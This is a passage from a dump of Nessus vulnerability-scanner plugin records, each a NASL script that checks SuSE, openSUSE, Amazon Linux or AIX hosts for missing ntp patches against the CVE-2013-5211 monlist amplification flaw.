\"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"6.1\", ml:\"09\", sp:\"02\", patch:\"IV56213s1a\", package:\"bos.net.tcp.client\", minfilesetver:\"6.1.9.0\", maxfilesetver:\"6.1.9.1\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:aix_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:25", "description": "The NTP time service could have been used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001:\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on\n\nhttp://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.\n\nAdditionally the following bug has been fixed :\n\n - ntp start script does not update the /var/lib/ntp/etc/localtime file if /etc/localtime is a symlink (bnc#838458)", "cvss3": {}, "published": "2014-07-30T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : ntp (SAT Patch Number 9540)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:ntp", "p-cpe:/a:novell:suse_linux:11:ntp-doc"], "id": "SUSE_11_NTP-140721.NASL", "href": "https://www.tenable.com/plugins/nessus/76910", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76910);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"SuSE 11.3 Security Update : ntp (SAT Patch Number 9540)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could have been used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we described in our\nsecurity advisory SUSE-SA:2014:001:\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on\n\nhttp://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\n\nAdditionally the following bug has been fixed :\n\n - ntp start script does not update the\n /var/lib/ntp/etc/localtime file if /etc/localtime is a\n symlink (bnc#838458)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=838458\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-5211.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 9540.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"ntp-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"ntp-doc-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"ntp-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"ntp-doc-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"ntp-4.2.4p8-1.24.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"ntp-doc-4.2.4p8-1.24.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:42", "description": "The NTP time service could be used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001 http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.", "cvss3": {}, "published": "2014-08-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ntp (openSUSE-2014-474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp", "p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:12.3", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-474.NASL", "href": "https://www.tenable.com/plugins/nessus/76958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-474.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76958);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"openSUSE Security Update : ntp (openSUSE-2014-474)\");\n script_summary(english:\"Check for the openSUSE-2014-474 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could be used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we described in our\nsecurity advisory SUSE-SA:2014:001\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f2d7bb0e\"\n );\n # http://support.novell.com/security/cve/CVE-2013-5211.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-5211/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-debuginfo-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"ntp-debugsource-4.2.6p5-9.6.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debuginfo-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debugsource-4.2.6p5-15.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:28", "description": "The version of ntp installed on the remote host is prior to 4.2.8p15-3. It is, therefore, affected by a vulnerability as referenced in the ALAS2-2021-1706 advisory.\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. (CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-16T00:00:00", "type": "nessus", "title": "Amazon Linux 2 : ntp (ALAS-2021-1706)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2021-09-20T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:ntp", "p-cpe:/a:amazon:linux:ntp-debuginfo", "p-cpe:/a:amazon:linux:ntp-doc", "p-cpe:/a:amazon:linux:ntp-perl", "p-cpe:/a:amazon:linux:ntpdate", "p-cpe:/a:amazon:linux:sntp", "cpe:/o:amazon:linux:2"], "id": "AL2_ALAS-2021-1706.NASL", "href": "https://www.tenable.com/plugins/nessus/153422", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2021-1706.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153422);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/20\");\n\n script_cve_id(\"CVE-2013-5211\");\n script_xref(name:\"ALAS\", value:\"2021-1706\");\n\n script_name(english:\"Amazon Linux 2 : ntp (ALAS-2021-1706)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of ntp installed on the remote host is prior to 4.2.8p15-3. It is, therefore, affected by a vulnerability as\nreferenced in the ALAS2-2021-1706 advisory.\n\n - The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a\n denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1\n requests, as exploited in the wild in December 2013. (CVE-2013-5211)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2/ALAS-2021-1706.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2013-5211\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'yum update ntp' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-5211\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/12/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntp-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:ntpdate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:sntp\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nvar os_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'ntp-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-debuginfo-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-debuginfo-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-debuginfo-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-doc-4.2.8p15-3.amzn2.0.4', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntp-perl-4.2.8p15-3.amzn2.0.4', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntpdate-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntpdate-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'ntpdate-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'sntp-4.2.8p15-3.amzn2.0.4', 'cpu':'aarch64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'sntp-4.2.8p15-3.amzn2.0.4', 'cpu':'i686', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'sntp-4.2.8p15-3.amzn2.0.4', 'cpu':'x86_64', 'release':'AL2', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, cpu:cpu, reference:reference, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-debuginfo / ntp-doc / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:52", "description": "The NTP time service could be used for remote denial of service amplification attacks.\n\nThis issue can be fixed by the administrator as we described in our security advisory SUSE-SA:2014:001 http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix this problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it will not be automatically fixed, you need to merge the changes manually as described.", "cvss3": {}, "published": "2014-07-31T00:00:00", "type": "nessus", "title": "openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-08-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp", "p-cpe:/a:novell:opensuse:ntp-debuginfo", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:13.1"], "id": "SUSE_13_1_OPENSUSE-2014--140722.NASL", "href": "https://www.tenable.com/plugins/nessus/76933", "sourceData": "#%NASL_MIN_LEVEL 999999\n\n# @DEPRECATED@\n#\n# This script has been deprecated as the associated patch is not\n# currently a security fix.\n#\n# Disabled on 2014/08/08.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014--1.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76933);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/07/20 0:18:55\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"openSUSE Security Update : openSUSE-2014- (openSUSE-2014--1)\");\n script_summary(english:\"Check for the openSUSE-2014--1 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NTP time service could be used for remote denial of service\namplification attacks.\n\nThis issue can be fixed by the administrator as we described in our\nsecurity advisory SUSE-SA:2014:001\nhttp://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.\nhtml\n\nand on http://support.novell.com/security/cve/CVE-2013-5211.html\n\nThis update now also replaces the default ntp.conf template to fix\nthis problem.\n\nPlease note that if you have touched or modified ntp.conf yourself, it\nwill not be automatically fixed, you need to merge the changes\nmanually as described.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2014-01/msg00005.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cf39e777\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-5211.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=857195\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected openSUSE-2014- packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'NTP Monitor List Scanner');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a security fix.\");\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debuginfo-4.2.6p5-15.5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"ntp-debugsource-4.2.6p5-15.5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:27:11", "description": "The monlist feature in ntpd in NTP allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "nessus", "title": "AIX 7.1 TL 2 : ntp (IV55365)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2023-04-21T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.1"], "id": "AIX_IV55365.NASL", "href": "https://www.tenable.com/plugins/nessus/76074", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory ntp_advisory.asc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(76074);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/21\");\n\n script_cve_id(\"CVE-2013-5211\");\n\n script_name(english:\"AIX 7.1 TL 2 : ntp (IV55365)\");\n script_summary(english:\"Check for APAR IV55365\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The monlist feature in ntpd in NTP allows remote attackers to cause a\ndenial of service (traffic amplification) via forged (1)\nREQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2023 Tenable Network Security, Inc.\");\n script_family(english:\"AIX Local Security Checks\");\n\n 